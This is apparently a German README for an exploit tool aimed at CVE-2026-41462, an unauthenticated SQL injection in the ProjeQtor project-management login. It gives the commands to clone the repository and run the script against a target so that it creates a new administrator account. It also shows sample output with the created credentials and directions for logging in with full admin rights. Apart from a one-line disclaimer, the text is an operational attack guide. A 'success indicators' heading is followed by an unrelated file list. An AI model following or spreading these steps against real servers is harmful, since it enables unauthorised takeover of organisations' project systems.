
CVE-2026-41462
Kritische unautorisierte SQL-Injection in ProjeQtor ≤ 12.4.3
CVE-2026-41462 ist eine kritische, nicht authentifizierte SQL-Injection-Schwachstelle in der Anmeldefunktionalität des Projektmanagement-Tools ProjeQtor.
python3 CVE-2026-41462.py -u http://target.com --create-admin
# Mit eigenen Anmeldedaten
python3 CVE-2026-41462.py -u http://target.com --create-admin \
--username admin123 --password StrongPass2026!
Wenn der Exploit erfolgreich ist, sehen Sie eine Ausgabe ähnlich dieser:
[+] Targeting: http://target.com
[+] Sende Payload, um Admin-Benutzer 'hacker' zu erstellen ...
[+] Anfrage erfolgreich gesendet.
[+] Neuer Admin erstellt → Benutzername: hacker | Passwort: Admin123!
[+] Versuchen Sie sich anzumelden unter: http://target.com/login.php
Öffnen Sie Ihren Browser und gehen Sie zu:
http://target.com/login.php
Melden Sie sich mit den im Skriptausgabe angezeigten Anmeldedaten an.
Bei Erfolg landen Sie auf dem ProjeQtor Admin Dashboard mit vollen Administratorrechten.
Erfolgsindikatoren:
| Datei | Beschreibung |
|---|---|
CVE-2026-41462.py | Haupt-Exploit-Skript |
CVE-2026-41462.yaml | Nuclei-Erkennungsvorlage |
README.md | Diese Dokumentation |
Klonen Sie das Repository:
git clone https://github.com/0xBlackash/CVE-2026-41462.git
cd CVE-2026-41462
Führen Sie den Exploit aus:
python3 CVE-2026-41462.py -u http://target.com --create-admin
Melden Sie sich mit dem neu erstellten Admin-Konto an.
Dieses Tool ist ausschließlich für Bildungszwecke und autorisierte Penetrationstests bestimmt. Die unbefugte Nutzung ist illegal.